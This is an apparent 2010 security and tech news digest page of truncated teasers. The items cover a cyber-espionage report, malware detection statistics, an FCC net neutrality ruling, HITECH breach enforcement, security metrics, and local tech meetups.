 In a followup to the "Tracking GhostNet" report, a new analysis of attacks against Tibetan and Indian cyber targets has been released titled "Shadows in the Cloud: Investigating Cyber Espionage 2.0". I highly recommend this report. The report is an excellent synopsis of an in-depth investigation into attacks and information thefts that: "...documents a complex ecosystem of cyber espionage that systematically compromised government, business, academic, and other computer network systems... read more» 
   
 





 Australian Crime Commission to overhaul network 
 (from Computer World at 7-4-2010) 
 The Australian Crime Commission (ACC) will overhaul its voice and networking infrastructure, flagging that it will simplify and consolidate its fixed-line voice telephony contractual arrangements and deploy a higher capacity secondary data network. The organisation currently operates a partially converged voice and data network between its Sydney, Brisbane, Canberra, Melbourne, Adelaide and Perth offices and its primary data network is built upon a virtual private LAN service delivered by Nex... read more» 
   
 





 Monthly Malware Statistics: March 2010 
 (from Securelist at 7-4-2010) 
 Malicious programs detected on users’ computers The first Top Twenty lists malicious programs, adware and potentially unwanted programs that were detected and neutralized when accessed for the first time, i.e. by the on-access scanner. There was no major change in the first Top Twenty leader board in March. Three variants to the Autorun Trojan are worthy of mention. As was the case a couple of months back, they are autorun.inf files that use removable devices to spread the notorious P2P... read more» 
   
 





 FCC network neutrality powers overturned by court 
 (from v3 at 7-4-2010) 
 A Federal Appeals Court has ruled that the Federal Communications Commission (FCC) does not have the right to enforce network neutrality rules, allowing Comcast to throttle back peer to peer traffic. In a 3-0 ruling the court for the District of Columbia Circuit found that the FCC lacked the authority to force internet service providers (ISPs) to treat all internet traffic evenly and Comcast could limit the speed of applications like peer to peer.... read more» 
   
 





 Attending Big Data Workshop 
 (from netmesh at 7-4-2010) 
 Location: Computer History Museum in Mountain View, CA. Date: April 23, 2010, 9am to 5pm. I hope to discuss with other attendees things such as: * key-value stores, document databases, graph databases, column stores etc. are all NoSQL databases. When and why would I choose one vs. another? * is there a future for NoSQL in the enterprise? Which vendors? What business models? * what are the requirements for data architectures in the cloud? * what can we do to drive business adoption of... read more» 
   
 





 Hackers and Founders Goes to Hacker Dojo 
 (from Meetup at 7-4-2010) 
 Location Hacker Dojo 140A S Whisman Road Mountain View, CA 94041 1-800-goog411 Who is hosting? Jonathan Nelson We are still ironing out the details, which we will post soon. This meetup, we have a group of hackers and founders visiting from the UK on the http://developermissi... tour. They asked us to set up a meetup for them, and we're happy to oblige. The organizer Jonathan Markwell came to our meetup from the UK the very first event we had, and we're looking forward to ca... read more» 
   
 





 State AGs Pick Up HITECH Enforcement 
 (from Channel Insider at 7-4-2010) 
 Forty-five states and territories now have data breach disclosure laws, but early indications are that state attorneys general are more willing to use the federal Health Information Technology for Economic and Clinical Health (HITECH) Act as a means for prosecuting lapses in exposed health care records. According to Health Leaders Media, Connecticut Attorney General Richard Blumenthal has brought legal action against several hospitals for not properly disclosing security lapses that resulted in ... read more» 
   
 





 CISecurity Metrics Move Ahead 
 (from Chuvakin at 7-4-2010) 
 The top three goals of metrics programs are to: 1. Improve security outcomes (35%) 2. Improve risk management decisions (30%) 3. Improve security process performance (15%) The top three reasons why metrics are requested are (in order): 1. For security trends 2. Evidence of compliance 3. To justify spending... read more» 
   
 


Reblog this post [with Zemanta]

Disqus for ePayment News